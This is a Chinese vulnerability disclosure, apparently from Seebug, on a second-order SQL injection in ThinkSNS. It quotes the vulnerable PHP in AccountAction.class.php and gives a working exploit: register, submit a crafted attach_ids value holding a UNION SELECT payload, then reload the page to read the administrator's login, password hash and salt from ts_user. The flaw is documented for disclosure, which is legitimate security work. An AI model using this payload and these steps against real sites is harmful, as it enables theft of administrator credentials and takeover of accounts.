<ul><li>/apps/public/Lib/Action/AccountAction.class.php</li></ul><pre class=""> public function doAuthenticate(){
$verifyInfo = D('user_verified')->where('uid='.$this->mid)->find();
$data['usergroup_id'] = intval($_POST['usergroup_id']);
if(!$data['usergroup_id']) $data['usergroup_id'] = 5;
……
//$data['info'] = t($_POST['info']);
$data['attach_id'] = t($_POST['attach_ids']);
if(D('user_verified_category')->where('pid='.$data['usergroup_id'])->find()){
$data['user_verified_category_id'] = intval($_POST['verifiedCategory']);
}else{
$data['user_verified_category_id'] = 0;
}
……
if($verifyInfo){
$data['verified'] = 0;
$res = D('user_verified')->where('uid='.$verifyInfo['uid'])->save($data);
}else{
$data['uid'] = $this->mid;
$res = D('user_verified')->add($data);
}
……
}
</pre><p>attach_ids存入数据库。</p><pre class=""> public function authenticate(){
$auType = model('UserGroup')->where('is_authenticate=1')->findall();
$this->assign('auType', $auType);
$verifyInfo = D('user_verified')->where('uid='.$this->mid)->find();
if($verifyInfo['attach_id']){
$a = explode('|', $verifyInfo['attach_id']);
foreach($a as $key=>$val){
if($val !== ""){
$verifyInfo['attachment'] .= D('attach')->where("attach_id=$a[$key]")->getField('name').'&nbsp;<a href="'.U('widget/Upload/down',array('attach_id'=>$a[$key])).'" target="_blank">下载</a><br />';
}
}
}
</pre><p>分割attach_ids然后带入SQL语句查询,由于上述attach_ids可控,导致二次注入的发生。</p><p>注册帐号并登陆,访问网址:</p><pre class="">http://10.211.55.12/thinksns/index.php?app=public&mod=Account&act=Authenticate</pre><p>填写必要字段,然后上传任意图片,修改attach_ids为:</p><pre class="">|77|-1 un<a>ion se<a>lect co<a>ncat(login,0x23,password,0x3a,login_salt) fr<a>om ts_user li<a>mit 1#<span style="font-family: arial, sans-serif; font-size: 16px; line-height: 1.6; background-color: transparent;"> </span></pre><p><img alt="2CCA9FB7-2B39-4037-98B8-741B5E776EAC.png" src="https://images.seebug.org/@/uploads/1434093460362-2CCA9FB7-2B39-4037-98B8-741B5E776EAC.png" data-image-size="821,662"><br></p><p>点击提交,再次访问上述网址,得到管理员账号以及密码:</p><p> </p><p><img alt="3A396FFB-FD9C-44EC-B411-8AF9ADD7726A.png" src="https://images.seebug.org/@/uploads/1434093481265-3A396FFB-FD9C-44EC-B411-8AF9ADD7726A.png" data-image-size="720,201"><br></p>
京公网安备 11010502034610号
暂无评论